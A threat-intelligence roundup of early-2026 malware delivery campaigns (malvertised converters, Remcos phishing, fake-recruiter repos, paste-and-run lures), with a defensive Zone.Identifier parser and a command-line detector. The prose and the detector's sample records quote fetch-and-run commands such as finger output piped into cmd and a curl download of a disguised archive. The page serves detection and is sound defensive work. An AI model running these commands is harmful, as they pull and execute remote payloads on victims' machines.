Malware Delivery via Deceptive Lures: Malvertising, Fake Recruitment Repos, and Phishing Dropping RATs

Tags: remote-access-implant, initial-access-method, phishing-campaign-intelligence, credential-stealer-activity, search-ad-manipulation

Updated March 21, 2026 at 02:52 PM · 2 sources


Multiple reports detail social-engineering-driven malware delivery that results in remote access trojans (RATs) and credential theft. Infoblox described gaining visibility into an affiliate push-notification ad network after taking over abandoned threat-actor domains through misconfigured DNS delegations (“Sitting Ducks”, i.e., lame name-server delegation); the takeover allowed it to collect ~57M logs over two weeks and observe widespread scams and brand impersonation delivered via push ads. Nextron Systems separately reported recurring malvertising chains in which “free converter” tools (e.g., document/image converters) downloaded via ads on legitimate sites function as advertised while covertly installing persistent RATs; a common artifact is the Windows Mark-of-the-Web (ZoneId=3) on the downloaded files, indicating internet origin.

Other activity in the set reflects different initial-access lures but the same general outcome—RAT-style access and data theft. Fortinet analyzed a phishing campaign using a fake Vietnam shipping document: a Word attachment leads to an RTF stage that exploits an RTF-related vulnerability, then uses VBScript/PowerShell to load a fileless .NET module, ultimately downloading and injecting a Remcos variant (including process hollowing) to provide full remote control. Separately, reporting on North Korea’s “Contagious Interview” campaign described fake recruiter outreach (e.g., via LinkedIn) that tricks developers into opening malicious code repositories; execution can be triggered via a hidden VS Code tasks configuration, server-side logic hooks, or a malicious npm dependency to steal credentials/crypto wallets and establish persistence—this is thematically similar (social engineering leading to remote access) but is a distinct operation from the malvertising/push-ad and Remcos phishing activity.
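The Mark-of-the-Web artifact mentioned above is a small INI-style text block stored in the file's `Zone.Identifier` alternate data stream. The following triage helper, written for this page and not taken from Infoblox, Nextron or Mallory, parses that stream, maps the ZoneId to its Windows zone name and recovers the referrer/host URLs a browser records; the file names and URLs in the sample streams are constructed.

```python
# Added example for this page: parse the NTFS Zone.Identifier stream that
# carries Mark-of-the-Web (MOTW) and classify a file's origin for triage.
# Not code from Infoblox, Nextron or Mallory; sample streams are constructed.
from __future__ import annotations

import configparser
from dataclasses import dataclass

# URLZONE values as Windows defines them; 3 (Internet) is the MOTW value
# the report calls out on the downloaded converter binaries.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}


@dataclass
class MotwInfo:
    zone_id: int | None          # None when the stream is missing or malformed
    zone_name: str
    referrer_url: str | None     # page the download was started from
    host_url: str | None         # URL the bytes were fetched from

    @property
    def from_internet(self) -> bool:
        return self.zone_id is not None and self.zone_id >= 3


def parse_zone_identifier(stream: str) -> MotwInfo:
    """Parse the text of a `<file>:Zone.Identifier` alternate data stream.

    The stream is INI-formatted with a [ZoneTransfer] section. Browsers add
    ReferrerUrl/HostUrl; other tools write only ZoneId. An absent or broken
    stream is reported as 'Unmarked', which matters during triage because
    archive extraction and some installers drop the mark.
    """
    unmarked = MotwInfo(None, "Unmarked", None, None)
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.optionxform = str  # keep key case exactly as written
    try:
        parser.read_string(stream)
    except configparser.Error:  # e.g. no [ZoneTransfer] header at all
        return unmarked
    if not parser.has_section("ZoneTransfer"):
        return unmarked
    section = parser["ZoneTransfer"]
    raw = section.get("ZoneId")
    try:
        zone_id = int(raw) if raw is not None else None
    except ValueError:
        zone_id = None
    if zone_id is None:
        return unmarked
    name = ZONE_NAMES.get(zone_id, "Unknown")
    return MotwInfo(zone_id, name, section.get("ReferrerUrl"), section.get("HostUrl"))


# Constructed sample streams keyed by file name (not real campaign artifacts).
SAMPLE_STREAMS = {
    "converter-setup.exe": (
        "[ZoneTransfer]\n"
        "ZoneId=3\n"
        "ReferrerUrl=https://ads.example.test/landing\n"
        "HostUrl=https://dl.example.test/converter-setup.exe\n"
    ),
    "notes.txt": "[ZoneTransfer]\nZoneId=0\n",   # created locally
    "extracted.dll": "",                          # no stream: mark was stripped
}


def triage(streams: dict[str, str]) -> dict[str, str]:
    """Return a verdict per file: 'internet-origin', 'local' or 'unmarked'."""
    verdicts = {}
    for name, stream in streams.items():
        info = parse_zone_identifier(stream)
        if info.from_internet:
            verdicts[name] = "internet-origin"
        elif info.zone_id is None:
            verdicts[name] = "unmarked"
        else:
            verdicts[name] = "local"
    return verdicts


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_STREAMS).items():
        info = parse_zone_identifier(SAMPLE_STREAMS[name])
        print(f"{name}: {verdict} (zone={info.zone_name}, referrer={info.referrer_url})")
```

On a live Windows host the stream text comes from reading `path + ":Zone.Identifier"`; the parser itself is platform-neutral, so it can be run over streams collected during an investigation. The "unmarked" verdict is deliberately distinct from "local": a binary with no stream that was nonetheless executed from a Downloads or AppData directory deserves the same scrutiny as a ZoneId=3 file.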

Timeline

  1. Jan 15, 2026

    Infoblox publishes analysis of a malicious push network from 57M logs

    Infoblox released a threat intelligence report examining a malicious push network using analysis of 57 million logs. The available reference does not provide further event details beyond the publication of the research.

  2. Jan 14, 2026

    Detection guidance and indicators released for converter malware campaign

    Nextron Systems released defensive guidance focused on monitoring scheduled task creation and execution, relevant Windows and Sysmon events, and using AppLocker or WDAC to block execution from user-writable paths. The publication also shared related delivery domains, code-signing certificate details, and file hashes tied to the campaign.

  3. Jan 14, 2026

    Researchers detail ConvertMate infection chain and persistence method

    Nextron Systems published technical analysis of a representative sample, ConvertMate.exe, showing it installs under %LocalAppData%, creates a victim identifier file, and uses PowerShell to register a scheduled task that launches a second-stage backdoor with delayed recurring execution. The report also described the backdoor's communication with confetly[.]com to authenticate, fetch .NET payloads, and return execution results.

  4. Jan 14, 2026

    Malvertising campaigns distribute trojanized file-converter software

    By mid-January 2026, researchers documented multiple active infection chains in which malicious Google ads and converter-themed websites tricked users into downloading fake or trojanized file-converter tools. The software appeared to work normally while covertly installing persistent remote access malware.


Sources

January 15, 2026 at 03:55 PM

Related Stories

Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads

Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.

1 month ago
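The Scarlet Goldfinch chain summarized in this related story (finger output piped into a shell, a curl download of an archive named like a PDF, extraction with `tar -xf`, and a double-extension `.lnk`) lends itself to a command-line detection. The detector below was written for this page and is not Red Canary's, Huntress's or Mallory's code; it runs over constructed Sysmon-style process-creation and file-creation records, and every host, path and user in them is made up.

```python
# Added example for this page (not Red Canary's, Huntress's or Mallory's
# code): a small detector for the paste-and-run chain described above, run
# over constructed Sysmon-style records. Hosts, paths and users are made up.
from __future__ import annotations

import ntpath
import re

# finger output fed into a shell, e.g. "finger user@203.0.113.10 | cmd"
FINGER_PIPE = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+\s*\|\s*(?:cmd|powershell)", re.I)
# curl writing a response to disk: remember where it went
CURL_OUT = re.compile(r"\bcurl(?:\.exe)?\b.*?(?:-o|--output)\s+\"?([^\s\"]+)", re.I)
# tar extracting (-xf, -xvf, ...) a named file
TAR_X = re.compile(r"\btar(?:\.exe)?\b.*?-x\w*f\s+\"?([^\s\"]+)", re.I)
# shortcut masquerading as a document via a double extension
DOUBLE_EXT_LNK = re.compile(r"\.(?:txt|pdf|docx?|xlsx?|jpe?g|png)\.lnk$", re.I)
DOC_EXT = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}


def _norm(path: str) -> str:
    return path.strip().strip('"').lower()


def scan(records: list[dict]) -> list[tuple[int, str]]:
    """Return (record index, description) for each suspicious record.

    The curl/tar pairing is stateful on purpose: a curl download of a '.pdf'
    is ordinary on its own and tar on a '.pdf' is merely odd; the two on the
    same path is the chain the report describes.
    """
    curl_outputs: dict[str, int] = {}
    findings: list[tuple[int, str]] = []
    for i, rec in enumerate(records):
        if rec.get("EventType") == "FileCreate":
            if DOUBLE_EXT_LNK.search(rec.get("TargetFilename", "")):
                findings.append((i, "shortcut with document-style double extension"))
            continue
        cl = rec.get("CommandLine", "")
        if FINGER_PIPE.search(cl):
            findings.append((i, "finger output piped into a shell"))
        if m := CURL_OUT.search(cl):
            curl_outputs[_norm(m.group(1))] = i
        if m := TAR_X.search(cl):
            path = _norm(m.group(1))
            ext = ntpath.splitext(path)[1]
            if ext in DOC_EXT:
                why = f"tar extracting a '{ext}' file"
                if path in curl_outputs:
                    why += f" that curl wrote in record {curl_outputs[path]}"
                findings.append((i, why))
    return findings


# Constructed Sysmon-style records (Event ID 1 and Event ID 11 shapes).
SAMPLE_RECORDS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c finger update@203.0.113.10 | cmd"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -s -o C:\Users\bob\AppData\Local\Temp\invoice.pdf https://cdn.example.test/d"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\tar.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"tar -xf C:\Users\bob\AppData\Local\Temp\invoice.pdf -C C:\Users\bob\AppData\Local\Temp\app"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -o C:\Users\bob\Downloads\report.pdf https://intranet.example.test/report.pdf"},
    {"EventType": "FileCreate",
     "TargetFilename": r"C:\Users\bob\Downloads\Contract.txt.lnk"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_RECORDS):
        print(f"record {idx}: {why}")
```

The fourth record (a plain curl download of a PDF with no later tar) produces nothing, which is the intended false-positive control; in a SIEM the `curl_outputs` map would be keyed by host and bounded by a time window rather than held for the whole batch.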
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware

Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.

1 month ago
Multiple RAT Delivery Campaigns Using Phishing and Trojanized Software

Security researchers reported several unrelated **remote access trojan (RAT)** delivery campaigns using different initial access vectors and lures. Seqrite Labs described “**Operation Covert Access**,” a spear‑phishing operation targeting Argentina’s judiciary with a ZIP attachment containing a convincing court-resolution decoy; execution is triggered by a malicious `LNK` masquerading as a PDF, which launches hidden PowerShell to fetch additional stages from a GitHub repository, culminating in a custom **Rust-based RAT** that attempts to blend in by renaming itself (e.g., `msedge_proxy.exe`). Separately, AhnLab Security Intelligence Center reported South Korea-focused activity distributing **RemcosRAT** through illegal online gambling-related tools and trojanized *VeraCrypt* installers, using embedded malicious VBS scripts and a multi-stage chain that ultimately deploys a RAT capable of surveillance and data theft (e.g., keylogging, screenshot/webcam/mic capture, credential/data harvesting). Another campaign documented by ReliaQuest abused **LinkedIn private messages** to deliver a bundled legitimate application alongside a malicious DLL for **DLL sideloading**, enabling RAT deployment under the guise of a trusted process; the reporting emphasized that social platforms can serve as effective phishing channels beyond email and that the technique is portable to other commonly used business messaging platforms.

1 month ago